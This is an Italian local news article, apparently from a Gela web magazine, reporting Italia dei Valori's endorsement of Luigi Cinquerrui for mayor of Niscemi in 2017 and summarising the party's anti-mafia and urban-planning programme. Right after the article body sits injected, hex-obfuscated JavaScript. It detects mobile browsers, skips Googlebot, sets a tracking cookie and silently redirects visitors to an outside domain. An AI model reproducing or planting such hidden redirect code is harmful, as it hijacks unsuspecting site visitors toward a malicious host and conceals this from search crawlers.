Politica

Idv sostiene Luigi Cinquerrui candidato a sindaco

Idv sostiene Luigi Cinquerrui candidato a sindaco

Niscemi – Il Partito di Italia dei Valori di Niscemi, in una situazione di sfiducia percepita e praticata dai cittadini nei confronti della politica, sostiene per le prossime elezioni amministrative del 11 Giugno 2017, l’Avv. Luigi Cinquerrui, espressione della società e non strutturato ai partiti , una figura che come IDV ed altri sempre coerenti nel dire  NO MUOS ,  per formare una grande coalizione democratica, con l’auspicio di rafforzare il progetto politico con valori riformisti e progressisti,  sollecitando  Toto Tinnirello   per continuare il suo impegno in difesa dei valori dell’imparzialità e del buon governo;

L’analisi politica va indirizzata e prospettata su  questi percorsi , oggi la nostra città  ha  bisogno di forti  contenuti culturali, di un nuovo modo di amministrare,  nel privilegiare alcuni valori quali : “ consapevolezza, conoscenze, esperienza , coraggio, onesta,   “grande cultura contro le mafie”,  che rafforzano le idee di un progetto , per governare le città , con   valori etici, morali , culturali , l’imparzialità del buon governo delle regole chiare e trasparenti,  nel rispetto della democrazia e delle istituzioni”.

Italia dei Valori conserva la propria storia e la propria identità, si propone di raccogliere e dar voce a tutti settori della nostra società di diversa matrice politica e ideologica uniti dalla riproposizione della cosiddetta “questione morale” e dei “diritti Civili”.

Italia dei Valori non ha nulla da vergognarsi, intende presentare il proprio simbolo in quanto   unica voce dell’opposizione al governo La Rosa;

Una coalizione deve misurarsi soprattutto su temi concreti per la costruzione di una società migliore; La politica seria non guarda alle prossime elezioni ma alla realizzazione del proprio progetto e lavora per convincere i cittadini della bontà della proposta. Tutto questo ha un solo nome democrazia reale e partecipata, i cittadini tornino ad essere protagonisti.

Il Partito di Italia dei Valori di Niscemi, intende prospettare alla coalizione e promuovere per il futuro Governo delle città, il progetto “Pensare le Città” che dovrà essere finalizzato all’elaborazione di Piani di Sviluppo Strategico, i quale dovranno analizzare ed esaminare i punti di forza e di debolezza delle città, nonché, le opportunità di sviluppo e crescita delle popolazioni;

I Piani di sviluppo strategico dovranno vertere su cinque grandi aree tematiche: sociale (famiglia, giovani, donne, tempo libero, casa, ecc.), cultura, turismo e spettacolo (valorizzazione delle risorse locali in un quadro di cittadinanza europea), sviluppo economico ed occupazionale (infrastrutture, innovazione tecnologica, insediamenti), territorio ed ambiente (spazi e tempi della città, mobilità); Sanità e servizi;

Il partito di Italia dei Valori  di Niscemi, propone alla coalizione democratica – riformista e progressista   l’adozione della Carta dei Principi, del governo delle regole chiare e trasparentidell’imparzialità nell’azione amministrativa ,    della partecipazione, della legalità , della solidarietà, della cultura, del rispetto dei beni comuni e del territorio; l’attuazione del “codice di autoregolamentazionedocumento approvato da Confindustria Sicilia ed anche   dalla Commissione Parlamentare Antimafia nella seduta del 3 aprile 2007; l’applicazione degli  articoli 10, 11 e 15 del D.Lgs 235/2012 che sono inserite norme di impossibilità a candidature o a nomine pubbliche e di derivazione pubblica e di decadenza dagli incarichi, riduzione del costo della politica;

Italia dei Valori ritiene che la coalizione tra gli obiettivi primati è di continuare la sua azione politica in sintonia con Avviso Pubblico, la rete degli enti locali per la formazione civile contro le mafie.

Intendiamo costruire un progetto di rinascita della città, per un modello di sviluppo, nel rispetto della domanda e dell’offerta di servizi, di beni comuni (acqua pubblica, aria e ambiente, No Muos, conoscenza), di diritti e doveri, in ambito di valori ideologici capaci di essere forze di governo per l’attuazione programmatica.

Il Partito di Italia dei Valori di Niscemi , è preoccupato dalla disaffezione dei cittadini nei confronti delle istituzioni e della politica intesa in senso istituzionale, la  fase politica attuale definita post – ideologica, con il prevalere di un linguaggio della antipolitica che prevale sulla politica, causa  del dissenso diffuso , di una non risposta  alle domande dei cittadini e la giusta critica alle scelte dei governi regionali e nazionali , con l’azione e   la reazione spontanea del nostro concittadino di esprimersi  con il non voto o un  voto all’antipolitica/politica;

Il Partito di Italia dei Valori di Niscemi, intende garantire alla comunità figure che presentano requisiti alti di valori   morali, di possedere una grande esperienza, una buona e ottima competenza, il coraggio di agire, conoscenza della macchina amministrativa; propone per l’arricchimento del progetto espressioni, fuori dagli schematismi dei partiti, delle personalità di grande spessore umano e culturale ed espressione delle diverse articolazione della città;  

Per questa analisi abbiamo utilizzato lo strumento della partecipazione democratica, gran parte dei nostri iscritti, ha dato delle indicazioni dagli insegnanti: Dr. Anna Zinna, Dr.ssa Fidone Mariolina, Dr.ssa Anna Ristagno, il rappresentante della Consulta, il presidente dell’Associazione Antiracket, ecc.…, tutte figure che non sono iscritte a IDV.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

banner vision

Stampa articolo
Visualizzazioni articolo: 261
Politica

di più in Politica

Sanità: il M5S regionale scende in campo per il caso ‘Gela’

Redazione26 giugno 2017

L’avvocato Massimiliano Conti nuovo Sindaco di Niscemi

Rosa Battaglia25 giugno 2017

Grasso ‘non farò il Governatore’

Redazione25 giugno 2017

Sfiducia sale a nove consiglieri: c’è il si di Casano e Sicilia Futura

Liliana Blanco24 giugno 2017

Pietro Grasso candidato alla Presidenza della Regione siciliana

Redazione22 giugno 2017

Crisi edilizia: ‘si preferiscano le imprese locali’

Redazione22 giugno 2017

Il Pd chiede un incontro al Presidente della commissione sanità regionale

Redazione22 giugno 2017

Sfiducia al sindaco: Articolo 1 dice si all’invito del M5S

Liliana Blanco21 giugno 2017

La commissione sanità sollecita la cura dell’ambiente

Redazione21 giugno 2017

Una ventata di freschezza nel panorama giornalistico locale. Una nuova avventura “web-based” voluta, creata e condotta da un team giovane e competente. Una piazza virtuale per tutti i gelesi sparsi nel mondo e non solo. Questo e molto altro nel nuovo web-magazine che racconterà Gela e il circondario attraverso notizie in tempo reale, approfondimenti e una particolare attenzione alle storie, ai personaggi e agli eventi.

iscritto al n.3/2010 del registro di stampa in data 28/05/2010 del tribunale di Gela
Direttore Responsabile: Rosa Laura Battaglia - Editore: Pubblivision P.IVA: 01991870856